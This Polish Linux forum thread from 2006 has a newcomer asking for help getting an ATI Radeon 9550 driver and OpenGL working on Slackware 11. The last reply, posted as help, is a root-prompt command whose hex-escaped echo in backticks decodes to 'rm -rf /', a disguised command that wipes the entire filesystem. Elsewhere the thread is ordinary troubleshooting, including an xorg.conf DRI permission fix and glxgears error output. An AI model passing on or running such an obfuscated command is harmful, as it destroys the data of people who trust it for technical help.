Radeon 9550 + S11 Kernel 2.6 + shell

Gdy jakieś urządzenie nie chce w Slackware działać...

Moderatorzy: Moderatorzy, Administratorzy

Stachoo
Użytkownik
Posty: 3
Rejestracja: 2006-10-26, 10:10
Lokalizacja: z neta

Radeon 9550 + S11 Kernel 2.6 + shell

Post autor: Stachoo »

Mam slacka 11 i jądro 2.6 (nie wiem dokładnie jakie ale było wbudowane w obraz płyty z slackware.com [nie mam dostępu do kompa z linuchem aktualnie])

Problem 1:
Nie za bardzo z wiązany z działem ale związany ze sprzętęm, więc po nieudanych (4 dniowych) instalacjach karty Radeon 9550 128mb 128bit firmy Sapphire coś namieszałem i po logowaniu do shella (nie mam domyślnie ustawionego startu ze kde [init]) zamiast nazwausera@nazwakompa: pisze mi bash coś tam coś tam, więc że ta forma występuje w atermie, wszystko by było dobrze jakbym umiał x`a odpalić ale po wbiciu startx lub kdm pisze że komenda nie istnieje :help:

Problem 2 i najważniejszy:
Nie potrafię zainstalować wogóle mojej karty graficznej!
Już reistalowałem 4 razy slacka po nieudanych próbach i wysypkach systemu, próbowałem wszytkie metody z tego forum i ogólnie z neta, sprawa wygląda tak, normalnie odpadam sterowniki w grafice (format .run) na userze, później z roota odpalam aticonfig --initial lub niby wszystko dobrze ale OpenGL działa tylko na roocie a na userze mam tylko sterowniki Vesa, próbowałem setki metod, bez grafiki, na x`ie roota itd. próbowałem też sterowniki RPM które przerabiałem na tar.gz, wógóle się nie chciały zainstalować. Podejżewam równierz jak by mi się udało odpalić komendę aticonfig --initial na userze to by działało ale przy końcu pisze mi że Bad file descriptor czy coś takiego, zmieniałem prawa pliku xorg.conf oraz sterowników OpenGL, też nie pomogło.
Aha i instalacja sterowników starszych wersji które pomogło innym userom (bodajże z tego forum) mi też nie pomogło. Proszę o pomoc :( :help: :help: :help:

Będę bardzo wdzięczny za udzielenie pomocy, z góry dziękuje i pozdrawiam
(sposoby które były w wyszukiwarce się nie sprawidziły)

-edit
Mam XOrg 6.9
Ostatnio zmieniony 2006-10-26, 23:06 przez Stachoo, łącznie zmieniany 3 razy.
Awatar użytkownika
pawian
Użytkownik
Posty: 51
Rejestracja: 2005-05-13, 20:54

Re: Radeon 9550 + S11 Kernel 2.6 + shell

Post autor: pawian »

jak ci niedziala z usera to dopisz do xorg.conf
Section "DRI"
Mode 0666
EndSection
Stachoo
Użytkownik
Posty: 3
Rejestracja: 2006-10-26, 10:10
Lokalizacja: z neta

Re: Radeon 9550 + S11 Kernel 2.6 + shell

Post autor: Stachoo »

Problem rozwiązany!
To po to ja ku*** siedziałem 20 godzin na kompie żeby samemu znaleść sposób na to, myślałem że dostane poradnik na 2 strony A4 a tu 4 linijki, nie no porażka :D dzięki Wam, nareście się udało, 20 godzin samemu lub 5 minut z tym forum, xD

Respect
Ostatnio zmieniony 2006-10-26, 18:33 przez Stachoo, łącznie zmieniany 1 raz.
Stachoo
Użytkownik
Posty: 3
Rejestracja: 2006-10-26, 10:10
Lokalizacja: z neta

Re: Radeon 9550 + S11 Kernel 2.6 + shell

Post autor: Stachoo »

Jednak nie rozwiązany :( ;(
glxgears:
__FGLTexMgrCreateObject: __FGLTexMgrSHMmalloc failed!!!
FGLTexMgr: open of shared memory object failed (Permission denied)
__FGLTexMgrCreateObject: __FGLTexMgrSHMmalloc failed!!!
45 frames in 5.0 seconds = 8.937 FPS

Wiec opengl nie pracuje tak jak powinien :(

Na Counter Strike odpalam to open gl chodzi tak (nawet menu) klatka co 5-10 sekund więc gra jest awykonywalna

Proszę o pomoc, z góry dziękuje
sayetan
Moderator w st. spocz.
Posty: 2193
Rejestracja: 2004-06-20, 21:47
Lokalizacja: Jelenia Góra

Re: Radeon 9550 + S11 Kernel 2.6 + shell

Post autor: sayetan »

Czy aby na pewno przejrzałeś ten temat?
# `echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`
ODPOWIEDZ